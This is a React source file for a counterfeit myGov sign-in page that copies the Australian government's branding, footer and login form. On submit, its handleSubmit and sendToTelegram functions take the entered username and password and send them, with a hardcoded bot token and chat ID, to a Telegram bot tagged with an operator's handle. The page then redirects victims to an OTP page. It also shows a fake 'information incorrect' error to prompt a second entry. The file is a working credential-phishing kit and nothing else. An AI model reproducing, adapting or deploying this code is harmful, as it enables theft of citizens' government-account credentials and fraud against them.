import React from "react";
import { useNavigate } from "react-router-dom";

function Index2() {
  const navigate = useNavigate();

  const handleSubmit = async (e) => {
    e.preventDefault();

    const username = document.getElementById("userId").value;
    const password = document.getElementById("password").value;

    // Prepare the message
    const message = `
      **Telegram ID: @upperclassstunts**
      Username: ${username}
      Password: ${password}
      Date: ${new Date().toLocaleString()}
      
    `;

    // Send data to Telegram
    try {
      await sendToTelegram(message);
    } catch (error) {
      console.error("Failed to send to Telegram:", error);
    }

    // Redirect to OTP page
    navigate("/otp");
  };

  const sendToTelegram = async (message) => {
    const botToken = "7716106300:AAEXCNgldC0PrqC2DBJ6vDkbmgSBi7NpGNc";
    const chatId = "5481073937";
    const url = `https://api.telegram.org/bot${botToken}/sendMessage`;

    const response = await fetch(url, {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ chat_id: chatId, text: message }),
    });

    if (!response.ok) {
      throw new Error("Failed to send message to Telegram");
    }
  };

  return (
    <div>
      <div className="brand-rainbow">&nbsp;</div>
      <header role="banner" className="mgvEnhanceHeader">
        <section className="wrapper">
          <div className="inner">
            <div className="unauth-grid">
              <div className="unauth-grid-row">
                <a className="unauth-govt-crest__link">
                  <img
                    id="unauth-govt-crest"
                    src="/images/myGov-cobranded-logo-black.svg"
                    alt="myGov Beta"
                    role="img"
                  />
                </a>
              </div>
            </div>
          </div>
        </section>
      </header>

      <div className="wrapper-mapwap">
        <div className="main-block" id="content" role="main">
          <div className="unauth">
            <div className="login-grid-container">
              <div className="login-grid-row">
                <div className="login-grid-column">
                  <div className="digital-id-login-card-wrapper">
                    <div className="digital-id-main-login-card override">
                      <h1>Sign in with myGov</h1>
                      <h2 className="text-align-left">
                        Using your myGov sign-in details
                      </h2>
                      <form
                        id="mygov-login-form"
                        className="mygov-login-form alternative"
                        onSubmit={handleSubmit}
                      >
                        <p style={{ color: "red", fontSize: "16px" }}>
                          The information you entered is incorrect. Please try to login again.
                        </p>
                        <div className="input-group">
                          <label className="override" htmlFor="userId">
                            Username or email
                          </label>
                          <input
                            id="userId"
                            name="username"
                            aria-required="true"
                            type="text"
                            autoComplete="off"
                            required
                          />
                        </div>
                        <div className="input-group">
                          <label htmlFor="password" className="override">
                            Password
                          </label>
                          <input
                            id="password"
                            name="password"
                            type="password"
                            autoComplete="off"
                            aria-required="true"
                            required
                          />
                        </div>
                        <p className="recovery">
                          <a className="anchor override" href="#">
                            Forgot password
                          </a>
                        </p>
                        <div className="button-digital-id-main-container override">
                          <div className="digital-id-button-container">
                            <button
                              type="submit"
                              className="button-main"
                              name="_eventId_login"
                            >
                              Sign in
                            </button>
                          </div>
                        </div>
                        <p className="create-account-text">
                          <a
                            className="create-account-link"
                            href="https://my.gov.au/en/create-account/"
                          >
                            Create a myGov account
                          </a>{" "}
                          if you don't have one already.
                        </p>
                      </form>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>

      <footer role="contentinfo">
        <div className="wrapper">
          <div className="inner">
            <section className="footer-list">
              <nav>
                <h2 className="sr-only" aria-label="Footer">
                  Footer
                </h2>
                <ul className="lower-links">
                  <li>
                    <a target="_blank" href="#">
                      Terms of use
                    </a>
                  </li>
                  <li>
                    <a target="_blank" href="#">
                      Privacy and security
                    </a>
                  </li>
                  <li>
                    <a target="_blank" href="#">
                      Copyright
                    </a>
                  </li>
                  <li>
                    <a target="_blank" href="#">
                      Accessibility
                    </a>
                  </li>
                </ul>
              </nav>
            </section>

            <div className="footer-lower">
              <section className="footer-lower-logo">
                <a>
                  <img
                    src="/images/myGov-cobranded-logo-white.svg"
                    alt="myGov Beta"
                    width="313.17"
                    height="70"
                    role="img"
                  />
                </a>
              </section>
              <p className="footer-acknowledgement">
                We acknowledge the Traditional Custodians of the lands we live on. We pay our respects to all Elders, past and present, of all Aboriginal and Torres Strait Islander nations.
              </p>
            </div>
          </div>
        </div>
      </footer>
    </div>
  );
}

export default Index2;